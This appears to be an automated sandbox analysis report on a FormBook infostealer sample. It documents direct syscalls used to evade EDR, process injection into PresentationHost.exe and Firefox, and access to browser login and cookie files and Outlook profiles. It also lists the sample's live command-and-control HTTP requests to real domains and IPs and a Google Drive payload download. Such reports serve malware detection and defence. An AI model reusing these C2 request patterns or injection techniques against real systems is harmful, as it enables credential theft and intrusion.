Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtSetInformationThread: Direct from: 0x77D263F9	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtQueryInformationToken: Direct from: 0x77D32CAC	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtCreateFile: Direct from: 0x77D32FEC	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtOpenFile: Direct from: 0x77D32DCC	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtSetInformationProcess: Direct from: 0x77D32C5C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtProtectVirtualMemory: Direct from: 0x77D32F9C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtOpenKeyEx: Direct from: 0x77D32B9C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtResumeThread: Direct from: 0x77D336AC	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtMapViewOfSection: Direct from: 0x77D32D1C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtWriteVirtualMemory: Direct from: 0x77D32E3C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtUnmapViewOfSection: Direct from: 0x77D32D3C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtCreateMutant: Direct from: 0x77D335CC	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtNotifyChangeKey: Direct from: 0x77D33C2C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtQuerySystemInformation: Direct from: 0x77D32DFC	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtReadFile: Direct from: 0x77D32ADC	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtAllocateVirtualMemory: Direct from: 0x77D32BFC	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtCreateUserProcess: Direct from: 0x77D3371C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtQueryInformationProcess: Direct from: 0x77D32C26	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtResumeThread: Direct from: 0x77D32FBC	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtDelayExecution: Direct from: 0x77D32DDC	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtQueryAttributesFile: Direct from: 0x77D32E6C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtSetInformationThread: Direct from: 0x77D32B4C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtCreateKey: Direct from: 0x77D32C6C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtReadVirtualMemory: Direct from: 0x77D32E8C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtClose: Direct from: 0x77D32B6C
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtAllocateVirtualMemory: Direct from: 0x77D33C9C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtWriteVirtualMemory: Direct from: 0x77D3490C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtOpenSection: Direct from: 0x77D32E0C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtQueryVolumeInformationFile: Direct from: 0x77D32F2C	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtTerminateThread: Direct from: 0x77D27B2E	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtAllocateVirtualMemory: Direct from: 0x77D348EC	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtAllocateVirtualMemory: Direct from: 0x77D32BEC	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtDeviceIoControlFile: Direct from: 0x77D32AEC	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	NtQuerySystemInformation: Direct from: 0x77D348CC	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: NULL target: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: NULL target: C:\Windows\SysWOW64\PresentationHost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: NULL target: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: NULL target: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\PresentationHost.exe

Thread register set: target process: 2400

Jump to behavior

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Process created: C:\Users\user\Desktop\mF8WNclxnv.exe "C:\Users\user\Desktop\mF8WNclxnv.exe"	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Process created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: Kf2uv5NZsp.exe, 0000000B.00000000.2196931404.00000000019C0000.00000002.00000001.00040000.00000000.sdmp, Kf2uv5NZsp.exe, 0000000B.00000002.3426046508.00000000019C1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: Kf2uv5NZsp.exe, 0000000B.00000000.2196931404.00000000019C0000.00000002.00000001.00040000.00000000.sdmp, Kf2uv5NZsp.exe, 0000000B.00000002.3426046508.00000000019C1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: Kf2uv5NZsp.exe, 0000000B.00000000.2196931404.00000000019C0000.00000002.00000001.00040000.00000000.sdmp, Kf2uv5NZsp.exe, 0000000B.00000002.3426046508.00000000019C1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: Kf2uv5NZsp.exe, 0000000B.00000000.2196931404.00000000019C0000.00000002.00000001.00040000.00000000.sdmp, Kf2uv5NZsp.exe, 0000000B.00000002.3426046508.00000000019C1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

Code function: 0_2_004061A0 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_004061A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.2314642445.0000000033860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3430583789.0000000007B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3424813910.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3426199689.0000000004CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2315053520.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\PresentationHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\PresentationHost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.2314642445.0000000033860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3430583789.0000000007B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3424813910.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3426199689.0000000004CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2315053520.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	212 Process Injection	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	1 Access Token Manipulation	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	212 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	1 Clipboard Data	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 4x nop then pop edi	11_2_07BEA58F
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 4x nop then xor eax, eax	11_2_07BDEA32
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 4x nop then xor eax, eax	12_2_02F69F20

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49709 -> 46.30.136.130:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49701 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49718 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49713 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49705 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49703 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49720 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49708 -> 46.30.136.130:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49693 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49717 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49707 -> 46.30.136.130:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49697 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49715 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49702 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49719 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49694 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49712 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49721 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49699 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49695 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49696 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49716 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49700 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49704 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49698 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49711 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49706 -> 46.30.136.130:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49714 -> 84.32.84.32:80

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 47.83.1.90 47.83.1.90

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: NTT-LT-ASLT NTT-LT-ASLT

Source: mF8WNclxnv.exe	Virustotal: Detection: 68%			Perma Link
Source: mF8WNclxnv.exe	ReversingLabs: Detection: 52%

Source:	DNS query: www.dappbtc.xyz
Source:	DNS query: www.justachillaiguy.xyz
Source:	DNS query: www.hypereth.xyz

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1MFRNZtVchGfitb5ocqetD889UhLAl8oE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1MFRNZtVchGfitb5ocqetD889UhLAl8oE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ok9c/?h0=YLMXATJHMHPX8be&OtnpVzY=x9zyhaurfUuw2RYgESqh0Itn9nG43R9Dpni4l6X/owof9ofIPJbXdvzUaQAC4z3pcvPSiswXQaAOiHe4Jpgc49reK0djB4ulTrARTwvoBoTyDoN42Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.rootsandremedy.shopUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome 45.0.2454.85 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /a4nz/?OtnpVzY=BvB6sAmqyfGQGoeIfwUty3pPcHVX1RNIxaUtPwKb2iP47WvKGYcjO0TAWlMSf+Gzv5Xfd/xhCIqYpGoRobLGmN67n/74DQXRFHP/U/Cq4+UwNCVAdQ==&h0=YLMXATJHMHPX8be HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.dappbtc.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome 45.0.2454.85 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /cipf/?h0=YLMXATJHMHPX8be&OtnpVzY=UcJ+O6g+CowIAIL75eOA6Y25K5TKvkvKQa73enlXCwOPvs/hGnOhTYfcU0Fa+sqmg4j63ggEJFpks21RkomH1r/MANp+i+WEc/0SY7uuRRyo3mIPWw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.isoemarket.shopUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome 45.0.2454.85 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /qp1t/?OtnpVzY=X+xqw53CCfA75b/OS0rFMYNWmI3qR7qs7khIsU8tp8EtaJ8v/D0mwTs7JuHxTn36IqvofohKZXGNW3kpVxCnVRyiHrYNTVRu4k30H8hHWq9EQKIIiQ==&h0=YLMXATJHMHPX8be HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.perfumedeparis.storeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome 45.0.2454.85 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /6t9o/?OtnpVzY=pCxWO4BRJU0RtEJOa6FcBCWzBBxeJJQEZx1AIw5yStrQw6EBZSRalM+MPmQOCP+Af7Go7Cgaj8kJgewFKIThsGx/saxQx42Oa7kLUIwwPJl8BJvWtw==&h0=YLMXATJHMHPX8be HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.essense.ltdUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome 45.0.2454.85 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /2hzu/?OtnpVzY=20zJcz1BpRIV1Rr7zMz7E5MXD6aZoaXtgZcfxi4E85D3zRIXMhRBwP3GGfjN/Nk+KowkOznGNPeqQqjma+3ZnxLKJaoYc/ZeVsrJAYvL/jT3F03XRg==&h0=YLMXATJHMHPX8be HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.justachillaiguy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome 45.0.2454.85 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /9fhz/?h0=YLMXATJHMHPX8be&OtnpVzY=rZ1oEd7XhjJ01ZbUTb00kLWHJH2/8IaQpSLaWq3VmwAd7D+am9keoyjBFRTA3RAHQZrof1ulAii7iqflQRGrzSN6EgujY9QlfWW8dtXJS54oQ0e7iw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.amzavy.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome 45.0.2454.85 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: www.rootsandremedy.shop
Source: global traffic	DNS traffic detected: DNS query: www.dappbtc.xyz
Source: global traffic	DNS traffic detected: DNS query: www.isoemarket.shop
Source: global traffic	DNS traffic detected: DNS query: www.perfumedeparis.store
Source: global traffic	DNS traffic detected: DNS query: www.essense.ltd
Source: global traffic	DNS traffic detected: DNS query: www.justachillaiguy.xyz
Source: global traffic	DNS traffic detected: DNS query: www.amzavy.info
Source: global traffic	DNS traffic detected: DNS query: www.hypereth.xyz

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

